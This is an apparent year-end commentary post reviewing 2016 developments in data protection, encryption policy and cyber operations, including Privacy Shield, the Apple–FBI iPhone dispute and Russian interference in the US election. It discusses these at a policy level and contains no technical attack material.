Privacy and data protection took a front seat in the European debate in 2016. The new US–EU data sharing agreement, Privacy Shield, was agreed in June this year and brought into force on 12 July. The agreement, designed by the US Department of Commerce and the European Commission, regulates the transatlantic transfer of EU data by US companies, in place of the ‘Safe Harbour’ model that was struck down last October by the European Court of Justice. It features ‘a number of additional clarifications and improvements’, including stronger restrictions, in response to concerns about US mass surveillance of European citizens.

Europe’s data protection focus continued with a string of crackdowns on various corporations. Microsoft received a formal notice in July for collecting ‘excessive’ user data through Windows 10 and failing to comply with the French Data Protection Act. The Chair of the National Data Protection Commission (CNIL), France’s privacy watchdog, accused the company of continuing to transfer data to the US under the provisions of the old Safe Harbour agreement.

Privacy feathers were also ruffled in August when WhatsApp announced a new information sharing deal with Facebook, involving the disclosure of user phone numbers. However, 28 European data protection authorities pushed back with an open letter to WhatsApp’s CEO. This protest, along with investigations in the UK, France and Italy, prompted Facebook to stop collecting WhatsApp user data from its European customers. Other companies, including Google, also had run-ins with European privacy regulators this year, and the continent’s focus on data protection is likely to continue into 2017.

The rift between the US government and Apple over access to the iPhone used by Syed Farook, one of the San Bernardino attackers, became the focal point of the encryption debate this year. US law enforcement’s push for Apple to build a back door into the smart phone was resisted and described by Apple CEO Tim Cook as dangerous government ‘overreach’. But in an unexpected twist, the Department of Justice revealed that a third party had provided an alternative method to access Farook’s phone data that ultimately rendered Apple’s cooperation unnecessary.

The divisive court case prompted the release of controversial draft legislation intended to outlaw end-to-end encryption, and the creation of a bipartisan encryption working group under the House Judiciary Committee and House Energy and Commerce Committee. The group just released its year-end report, concluding that ‘any measure that weakens encryption works against the national interest’, laying the groundwork for further debate next year.

Russian efforts to influence the US Presidential election campaign caused a major splash this year. The media coverage was dominated by the leak of Democratic National Committee (DNC) donor lists and opposition research by supposed lone-hacker Guccifer 2.0 and the dissemination of more than 20,000 confidential DNC emails via Wikileaks. In October, the US Intelligence Community released a statement that it was ‘confident’ that the Russian government was behind these incidents, which were allegedly designed to undermine Hillary Clinton’s candidacy and ensure a more Putin-friendly administration under Donald Trump. While Trump continues to dismiss the intel agencies’ conclusion as a ‘laughing point’, President Obama is pushing in the opposite direction, suggesting that Russian President Vladimir Putin had a direct hand in these operations and ordering a full investigation into the issue. The US has been criticised for its lack of response to these incidents and Obama says the US will respond ‘at a time and place of our own choosing’. The key question is how these tensions will play out under the new Trump administration.

There are a whole range of interesting cyber developments on the horizon so be sure to follow ICPC’s commentary in 2017. See you next year!